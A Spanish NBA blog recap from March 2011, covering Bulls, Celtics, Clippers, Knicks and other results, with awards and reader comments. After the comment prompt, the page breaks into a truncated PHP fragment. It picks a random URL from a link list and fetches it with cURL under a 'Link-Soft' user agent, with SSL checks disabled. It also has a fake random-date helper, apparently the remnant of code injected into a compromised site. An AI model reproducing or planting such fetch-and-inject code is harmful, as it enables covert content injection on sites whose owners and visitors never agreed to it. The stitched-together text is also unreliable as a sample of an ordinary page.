La Crónica (09/03/2011)

10 de March de 2011 por TheDeerHunter

Se esperaba una jornada de transición aburrida, sin mucha emoción y grandes duelos directos. Nada más lejos de lo que al final tuvo lugar.

Saltan las alarmas en Chicago. Ganaron bien en Charlotte asegurando definitivamente su presencia en la postemporada (101-84), pero Boozer terminó lesionado tras una falta asesina de Kwane Brown. Ante el espeluznante incidente y su legendaria capacidad de recuperación es para estar preocupados.

Los Celtics también se llevaron un disgusto. Victoria de los Clippers en el Garden (108-103) con partidazo de Mo Williams. Con Griffin bien controlado surgió un DeAndre Jordan que parecía Shaquille O’neal en sus tiempos. Krstic fue el mejor de los suyos, pero es evidente que la defensa interior no es la misma a la que estábamos acostumbrados en los subcampeones. Aún así también aseguran su plaza, como los Spurs que no tuvieron problemas contra Detroit (104-111).

No fue la única sorpresa de la noche. Los Hornets supieron sobreponerse a la baja de Chris Paul y al acierto infame de Ariza para ganar nada menos que a los Mavericks (92-93). El equipo de Carlisle tuvo a bien hacerles un favorcito y regalaron el partido de la manera más absurda posible. Primero fueron dos inoportunos tiros libres fallados por Chandler a escasos segundos del final que les hubieran garantizado al victoria. Después, una falta de tres tiros de Kidd a Jack y la consiguiente derrota. Seguro que los Lakers no se creían tanta consideración.

Por muy poco los Thunder no cayeron en Philadelphia (110-105). La tuvo Iguodala para llevarse el partido pero resolvió atropellando a Westbrook en una entrada kamikaze. En la prórroga, en cambio, no hubo color. Los Knicks también tuvieron que tirar de la maestría de Melo en el buzzer beater para obtener una valiosa victoria en Memphis (110-108). Tony Allen hizo lo que pudo para defender ese último tiro pero la nueva estrella de los Knicks en ese aspecto es de lo mejor que hay. Los Jazz también ganaron en Toronto de milagro con polémica y un palmeo afortunado de Jefferson en el último instante (96-94). Orlando también sufrió en Sacramento aún con Howard (106-102) y los Nets también resolvieron un choque apretado ante Golden State (90-94) consiguiendo así su tercera victoria consecutiva.

Finalmente, Love incrementó su récord y, lo que es más noticioso, ayudó en la paliza de los Wolves a Indiana (75-101). Los Bucks, con ese resultado y su victoria ante Cleveland (90-110), se ponen más cerca que nunca de plaza de postemporada.

PREMIOS

MVP: La combinación Durant-Westbrook acabó siendo demoledora y demasiado para los Sixers. 34 puntos y 16 rebotes del primero más 27 puntos, 5 rebotes y 12 asistencias del segundo.

Rookie: Demarcus Cousins suma y sigue. Nuevo récord personal de anotación con 29 puntos que acompañó con 7 rebotes y 3 robos. Lástima de sus 7 pérdidas.

Sorpresa: Rezuma clase por todos sus poros pero lamentablemente no todos los días nos deleita con buenas actuaciones. Anoche, Tracy McGrady puso en aprietos a los Spurs con 15 puntos, 6 rebotes, 9 asistencias y 2 robos.

Decepción: Trevor Ariza y Jason Kidd se citaron en la cancha para llevar a cabo un peculiar duelo: comprobar quien de los dos era capaz de fallar más canastas. Al final ganó el primero que no anotó ninguno de sus 10 lanzamientos pero Kidd se quedó cerca con sus 7 intentos.

Esfuerzo en vano: Jrue Holiday lo intentó todo pero ante la parejita de Oklahoma no pudo hacer nada. 22 puntos, 4 rebotes, 8 asistencias y 3 robos que se lleva el viento.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    Que los Clippers haya ganado esta temporada a los 4 máximos aspirantes al título, Lakers, Heat, Spurs y Celtics (supongo que debe ser el único equipo que lo ha logrado), dice mucho del potencial y del futuro de este equipo, que, a pesar de que va a quedar fuera de playoffs, no es un equipo perdedor como los Wolves de Kevin Love, y van a ser un fijo en playoffs en los próximos años.

      Citar

  2. Hynreck dice:
    #2

    Pienso que Melo es el mejor jugador clutch de la liga. La cantidad de partidos que lleva resueltos así.

      Citar

  3. MagicJohnson32 dice:
    #3

    Buenooooooo, si Boozer tiene un esguince o una uña rota o algo así, la cosa va para meses…

    ¿Alguien tiene la más mínima idea de qué pretende Kuester? Yo creo que ni él mismo lo sabe.

      Citar

  4. GreenPride dice:
    #4

    Bueno de anoche vi el Celtics-Clippers y el Grizzlies-Knicks.
    Boston jugó unos 2 primeros cuartos horrorosos en defensa que permitieron un 68% de acierto en los Clippers y más de 20 puntos de ventaja para ellos. Les entraba todo es cierto pero los Celtics no se enteraban de nada en defensa tanto interior como exterior. En la segunda parte tiraron de lo que tiene este equipo, clase y orgullo de nunca bajar los brazos y a punto estuvieron de darle la vuelta poniendose a 3 con más de 5 minutos por jugar con Pierce y Allen muy bien y la defensa de vuelta a lo normal en ellos pero como suele pasar con estas remontadas de tantos puntos si no culminas al final el otro suele capear el temporal y aquí surgió Mo Williams con varias canastas claves para conseguir la victoria. En principio no tiene por qué variar el rumbo de los Celtics pero los Bulls se les acercan y pueden tener un fin de temporada más agitado de lo que suponían. Necesitan la vuelta de los O’Neal y Glen Davis para ser más duros en su defensa interior. Por los Clippers, controlado Griffin por Garnett se salio DeAndre Jordan ante la nula defensa celtic en el primer tiempo y lo dicho de Mo Williams que estuvo fenomenal. Son un equipo que ya el año que viene pueden dar mucho de sí.
    En Memphis, partido interesante ganado por los Knicks a pesar de sí mismos. Cada equipo en su estilo los Grizzlies robando muchos balones y yendo a anotar desde cerca del aro y los Knicks machacando a triples a la defensa tan agrasiva de Memphis y haciendo valer el talento de Carmelo y Stat. Con su gran acierto los Knicks se distanciaron bastante pero en el último cuarto vieron como la defensa de Memphis y su energía empataban el partido. Tras un par de fallos garrafales de Carmelo como la falta a Randolph que le dejaba empatar el partido y un par de tiros fallados al final se redimió con el canastón de la victoria. Los Knicks serán rival duro en playoffs y Memphis si acaban llegando que yo creo que sí también serán un rival incómodo.
    Del resto, me sorprende lo de Dallas. Mal momento para aflojar cuando los Lakers vienen a todo tren a por ellos. O espabilan o perderan el segundo puesto del Oeste y el factor campo en una posible segunda eliminatoria con LA. Para mí importantísimo para los Mavs si quieren tener alguna opción ante los angelinos. También habrá que ver el alcance de la lesión de Boozer, importantísimo para saber si los Bulls pasan de claros candidatos a anillo como son ahora a bajar mucho en las quinielas. Con su historial seguro que en Chicago hay mucha gente con los dedos cruzados para que no se haya roto.

      Citar

  5. Viva_Dirk dice:
    #5

    Bueno Hynreck, entiendo que Melo mola un montón, pero la de partidos que lleva decididos así….en la regular season, que no esta nada mal eh, pero cuando de verdad es clutch es en play-offs y ahí su ‘hoja de servicio’ no tiene demasiadas estrellas.

    Además que decir que es el mejor de toda la liga cuando Kobe anda suelto y hay unos cuantos mas que han hecho barbaridades en play-offs es pasarse.

      Citar

  6. Len Bias dice:
    #6

    Granger 2-19, se quedó cerquita de los números de Bosh

      Citar

  7. MagicJohnson32 dice:
    #7

    Con la pájara que tienen los Pacers, y todavía están en Playoffs. Es ridículo.

      Citar

  8. miquel dice:
    #8

    los nets acaban un cuarto de todas las victortias de la 2009/2010

      Citar

  9. Sempren dice:
    #9

    Gran bache de los Pacers, cuando parecía que habían mejorado tanto con el cambio de entrenador.
    Granger se lleva la palma, pero el boxscore del partido tampoco deja en buen lugar a otros: 0 puntos para Hibber o tres de Collison no son normales por mucho que solo hayan jugado unos 20 minutos.

    Por otra parte, viendo las estadísticas, gran defensa de Cleveland al base rival: 7/10 para Jennings y 8/9 para ‘Lentejita’ Boykins, con dos triples en tres intentos para cada uno xD

    Por último, muy importante lo de Boozer, ya que los Bulls podrían pasar de aspirantes a todo, a volver a ser el equipo durísimo en PlayOffs de estos últimos años, pero sin aspiraciones reales de anillo (ni campeones de conferencia, en mi opinión, aunque Rose haya mejorado tanto).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>